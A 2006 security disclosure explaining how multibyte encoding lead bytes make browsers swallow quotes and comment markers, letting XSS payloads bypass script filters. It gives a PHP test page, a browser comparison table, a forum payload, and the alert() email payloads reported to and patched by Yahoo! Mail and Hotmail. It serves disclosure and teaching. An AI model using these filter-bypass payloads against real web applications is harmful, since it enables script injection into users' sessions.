    Bypassing script filters with variable-width encodings

    Author: Cheng Peng Su (applesoup_at_gmail.com)
    Date: August 7, 2006


    It is well known that a central problem in constructing XSS attacks is
    obfuscating the malicious code so that it slips past script filters. In
    the following paragraphs I explain how script filters can be bypassed
    with variable-width encodings, and disclose how I applied this concept
    to the Hotmail and Yahoo! Mail web-based mail services.


    Variable-width encoding Introduction
    ====================================

    A variable-width encoding (a.k.a. variable-length encoding) is a type of
    character encoding scheme in which codes of differing lengths are used
    to encode a character set. The most common variable-width encodings are
    multibyte encodings, which use varying numbers of bytes to encode
    different characters. Multibyte encodings were first used for Chinese,
    Japanese and Korean, whose character sets are well in excess of 256
    characters. The Unicode standard has two variable-width encodings:
    UTF-8 and UTF-16. The most commonly used multibyte codes are two-byte
    codes; the EUC-CN form of GB2312, EUC-JP and EUC-KR are examples of
    such two-byte EUC codes. There are also some three-byte and four-byte
    codes.
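
    To make the idea of "codes of differing lengths" concrete, the short
    Python sketch below counts how many bytes a character occupies in
    several of the encodings named above. The sample characters and the
    helper name encoded_length are illustrative choices, not part of the
    original text.

```python
# Illustrative sketch: how many bytes one character occupies per encoding.
# SAMPLES, ENCODINGS and encoded_length() are names chosen for this example.
SAMPLES = {
    "LATIN CAPITAL LETTER A": "A",
    "CJK IDEOGRAPH U+4E2D": "\u4e2d",
}
ENCODINGS = ["utf-8", "utf-16-le", "gb2312", "big5", "euc_kr", "euc_jp", "shift_jis"]


def encoded_length(char: str, encoding: str) -> int:
    """Return the number of bytes `char` occupies in `encoding`."""
    return len(char.encode(encoding))


for name, char in SAMPLES.items():
    for encoding in ENCODINGS:
        print(f"{name:24} {encoding:10} {encoded_length(char, encoding)} byte(s)")
```

    In the legacy CJK encodings the ASCII letter stays one byte while the
    ideograph takes two, which is exactly the property the rest of this
    text relies on: a lead byte announces that the next byte belongs to it.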


    Example and Discussion
    ======================

    The following PHP file serves as a starting point for introducing the idea.

    ------------------------------example.php--------------------------------

    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    </head>
    <body>
    <?php
    // Emit one pair of FONT elements for every possible byte value.
    for ($i = 0; $i < 256; $i++) {
        echo "Char $i is <font face=\"xyz" . chr($i) . "\">not </font>"
            . "<font face=\" onmouseover=alert($i) notexist=" . chr($i) . "\"     >"
            // NOTE: 5 space characters following the last \"
            . "available</font>\r\n\r\n<br>\r\n\r\n";
    }
    ?>
    </body>
    </html>

    -------------------------------------------------------------------------

    For most values of $i, Internet Explorer 6.0 (SP2) displays "Char XXX
    is not available". When $i is between 192 (0xC0) and 255 (0xFF),
    however, it displays "Char XXX is available". Take $i=0xC0 as an
    example and consider the following output, where [0xC0] stands for the
    raw byte 0xC0:

    Char 192 is <font face="xyz[0xC0]">not </font><font face="
    onmouseover=alert(192) notexist=[0xC0]"     >available</font>

    0xC0 is one of the 32 lead bytes of 2-byte sequences (0xC0-0xDF) in
    UTF-8. When IE parses the above code, it treats 0xC0 and the quote that
    follows it as a single sequence, so that quote no longer terminates the
    attribute. The two FONT elements therefore merge into one, with
    "xyz[0xC0]">not </font><font face=" as the value of the FACE
    parameter. The second 0xC0 starts another 2-byte sequence, which
    swallows the closing quote and becomes the value of the unquoted
    NOTEXIST parameter. Because space characters follow that quote, a lead
    byte of a 3-byte sequence (0xE0-0xEF) is combined with the quote and
    one space character to form the value of the NOTEXIST parameter.
    Likewise, each lead byte of a 4-byte sequence (0xF0-0xF7), 5-byte
    sequence (0xF8-0xFB) or 6-byte sequence (0xFC-0xFD), as allowed by the
    original UTF-8 definition, is combined with the following quote and
    space characters into one sequence.
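
    The parsing behaviour described above can be modelled in a few lines of
    Python. This is only a sketch under stated assumptions: lenient_decode
    is a hypothetical decoder that trusts the lead byte and never checks
    the trailing bytes, which mimics the observed result and is not IE's
    actual implementation. Treating 0xFE and 0xFF like 6-byte lead bytes is
    likewise an assumption of this sketch.

```python
def utf8_sequence_length(lead: int) -> int:
    """Sequence length implied by a lead byte (original 1-6 byte UTF-8 scheme)."""
    if lead < 0xC0:
        return 1  # ASCII or a stray continuation byte: one byte on its own
    if lead <= 0xDF:
        return 2
    if lead <= 0xEF:
        return 3
    if lead <= 0xF7:
        return 4
    if lead <= 0xFB:
        return 5
    return 6  # 0xFC-0xFD; 0xFE/0xFF handled the same way (assumption)


def lenient_decode(data: bytes) -> str:
    """Hypothetical decoder that swallows trailing bytes without validating them."""
    out = []
    i = 0
    while i < len(data):
        length = utf8_sequence_length(data[i])
        # A multibyte sequence collapses into a single placeholder character.
        out.append(chr(data[i]) if length == 1 else "?")
        i += length
    return "".join(out)


markup = (b'<font face="xyz\xc0">not </font>'
          b'<font face=" onmouseover=alert(192) notexist=\xc0"     >available</font>')

print(lenient_decode(markup))                          # two quotes are gone
print(markup.decode("utf-8", errors="replace"))        # strict decoder keeps all four
```

    A decoder that validates continuation bytes, such as Python's own
    UTF-8 codec, replaces only the invalid lead byte and leaves the quote
    in place, so the attribute boundaries survive.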

    The table below shows how Internet Explorer 6.0 (SP2), Firefox 1.5.0.6
    and Opera 9.0.1 (columns IE, FF and OP) parse the above code under
    different variable-width encodings. Each cell lists the ranges of byte
    values for which "available" is displayed.

    +-----------+-----------+-----------+-----------+
    |           | IE        | FF        | OP        |
    +-----------+-----------+-----------+-----------+
    | UTF-8     | 0xC0-0xFF | none      | none      |
    +-----------+-----------+-----------+-----------+
    | GB2312    | 0x81-0xFE | none      | 0x81-0xFE |
    +-----------+-----------+-----------+-----------+
    | GB18030   | none      | none      | 0x81-0xFE |
    +-----------+-----------+-----------+-----------+
    | BIG5      | 0x81-0xFE | none      | 0x81-0xFE |
    +-----------+-----------+-----------+-----------+
    | EUC-KR    | 0x81-0xFE | none      | 0x81-0xFE |
    +-----------+-----------+-----------+-----------+
    | EUC-JP    | 0x81-0x8D | 0x8F      | 0x8E      |
    |           | 0x8F-0x9F |           | 0x8F      |
    |           | 0xA1-0xFE |           | 0xA1-0xFE |
    +-----------+-----------+-----------+-----------+
    | SHIFT_JIS | 0x81-0x9F | 0x81-0x9F | 0x81-0x9F |
    |           | 0xE0-0xFC | 0xE0-0xFC | 0xE0-0xFC |
    +-----------+-----------+-----------+-----------+


    Application
    ===========

    I don't think there is one typical way to exploit this, because the
    technique is very flexible. The point to remember is that if a web
    application uses a variable-width encoding, you can bury the characters
    that follow your input, and those buried characters may be crucial
    ones.

    The above code might be exploited in general web applications that let
    you add formatting to your input in the same way as HTML does. For
    example, in some forums, [font=Courier New]message[/font] in your
    message will be transformed into
    <font face="Courier New">message</font>.

    Supposing the forum uses UTF-8, we can attack by sending

    [font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert()
    s=[0xC0]]exploited[/font]

    which will be transformed into

    <font face="xyz[0xC0]">buried</font><font face="abc
    onmouseover=alert() s=[0xC0]">exploited</font>
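
    The transformation can be sketched with a hypothetical forum renderer.
    The regular expression and the function name render_font_tags are
    assumptions made for illustration; a real forum's rules will differ.
    The sketch rejects quotes and angle brackets in the font name, yet the
    payload passes because it contains none of them, only the raw 0xC0
    byte.

```python
import re

# Hypothetical [font=...] rule: the font name may not contain ], ", < or >.
FONT_TAG = re.compile(rb'\[font=([^\]"<>]*)\](.*?)\[/font\]', re.S)


def render_font_tags(message: bytes) -> bytes:
    """Turn [font=NAME]TEXT[/font] into <font face="NAME">TEXT</font>."""
    return FONT_TAG.sub(rb'<font face="\1">\2</font>', message)


payload = (b"[font=xyz\xc0]buried[/font]"
           b"[font=abc onmouseover=alert() s=\xc0]exploited[/font]")

print(render_font_tags(payload))
```

    The renderer itself adds the quotes that the 0xC0 bytes later swallow
    in the browser, so filtering quotes out of the user's input does not
    help on its own.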

    Again, the exploitation is very flexible; this FONT-FONT example is
    only meant to illustrate the idea. The following exploit against
    Yahoo! Mail is quite different from this one.


    Disclosure
    ==========

    Using this method, I found two XSS vulnerabilities, one in Hotmail and
    one in Yahoo! Mail. I informed Yahoo and Microsoft on April 30 and
    May 12 respectively, and both have since patched the vulnerabilities.

    Yahoo! Mail XSS
    ---------------

    Before I discovered this vulnerability, the Yahoo! Mail filtering
    engine already blocked attempts to smuggle the "expression()" syntax
    into a CSS attribute by breaking it up with a comment, as in
    expr/* */ession(). I placed [0x81] before the asterisk of the first */
    so that the browser would treat those two bytes as one sequence and
    only the second */ would close the comment. The filtering engine,
    however, paired the opening /* with the first */ and therefore did not
    recognise the expression() syntax.

    --------------------------------------------------------------------
    MIME-Version: 1.0
    From: user<user@site.com>
    Content-Type: text/html; charset=GB2312
    Subject: example

    <span style='expr/*[0x81]*/*/ession(alert())'>exploited</span>
    .
    --------------------------------------------------------------------
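
    The mismatch between the two parsers can be sketched as follows. Both
    functions are hypothetical models written for this illustration:
    filter_view strips CSS comments byte by byte, as the filter appears to
    have done, while lenient_double_byte_view first lets every byte in
    0x81-0xFE swallow the byte after it (the range reported for IE under
    GB2312 in the table above) and only then strips comments.

```python
import re


def filter_view(style: bytes) -> bytes:
    """Byte-oriented model of the filter: strip /* ... */ ignoring the charset."""
    return re.sub(rb"/\*.*?\*/", b"", style, flags=re.S)


def lenient_double_byte_view(style: bytes) -> str:
    """Model of the browser: a lead byte swallows the next byte, then strip comments."""
    chars = []
    i = 0
    while i < len(style):
        if 0x81 <= style[i] <= 0xFE:
            chars.append("\ufffd")  # lead byte plus trailing byte become one character
            i += 2
        else:
            chars.append(chr(style[i]))
            i += 1
    return re.sub(r"/\*.*?\*/", "", "".join(chars), flags=re.S)


payload = b"expr/*\x81*/*/ession(alert())"

print(filter_view(payload))               # the filter's view, no "expression"
print(lenient_double_byte_view(payload))  # the browser's view
```

    The filter closes the comment at the first */ and is left with a
    harmless-looking string, while the browser model closes it at the
    second */ and reassembles the expression() call.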

    Hotmail XSS
    -----------

    This exploit is almost the same as example.php.

    --------------------------------------------------------------------
    MIME-Version: 1.0
    From: user<user@site.com>
    Content-Type: text/html; charset=SHIFT_JIS
    Subject: example

    <font face="[0x81]"></font><font face=" onmouseover=alert()
    s=[0x81]">exploited</font>
    .
    --------------------------------------------------------------------
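
    As a rough illustration of what this message does to its own markup,
    the sketch below scans a byte string for quotes that sit directly
    after a Shift_JIS lead byte. The lead-byte ranges are the ones listed
    for SHIFT_JIS in the table above; the function name swallowed_quotes
    and the simple two-byte walk are assumptions of this sketch, not a
    complete Shift_JIS parser.

```python
# Lead-byte ranges taken from the SHIFT_JIS row of the table above.
SHIFT_JIS_LEAD_RANGES = [(0x81, 0x9F), (0xE0, 0xFC)]


def is_lead_byte(value: int, ranges=SHIFT_JIS_LEAD_RANGES) -> bool:
    """True if `value` falls inside one of the lead-byte ranges."""
    return any(low <= value <= high for low, high in ranges)


def swallowed_quotes(data: bytes, ranges=SHIFT_JIS_LEAD_RANGES) -> list:
    """Return offsets of quote characters that directly follow a lead byte."""
    offsets = []
    i = 0
    while i < len(data):
        if is_lead_byte(data[i], ranges) and i + 1 < len(data):
            if data[i + 1] in b"\"'":
                offsets.append(i + 1)
            i += 2  # the lead byte consumes the byte after it
        else:
            i += 1
    return offsets


message = (b'<font face="\x81"></font>'
           b'<font face=" onmouseover=alert() s=\x81">exploited</font>')

print(swallowed_quotes(message))
```

    Both closing quotes in the message are reported, which matches the
    FONT-FONT merge shown for example.php.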


    Reference
    =========

    Wikipedia: Variable-width encoding (http://en.wikipedia.org/wiki/Variable-width_encoding)
    RFC 3629, the UTF-8 standard (http://tools.ietf.org/html/rfc3629)
    RSnake: XSS Cheat Sheet (http://ha.ckers.org/xss.html)


    ( Original text: http://applesoup.googlepages.com/bypass_filter.txt )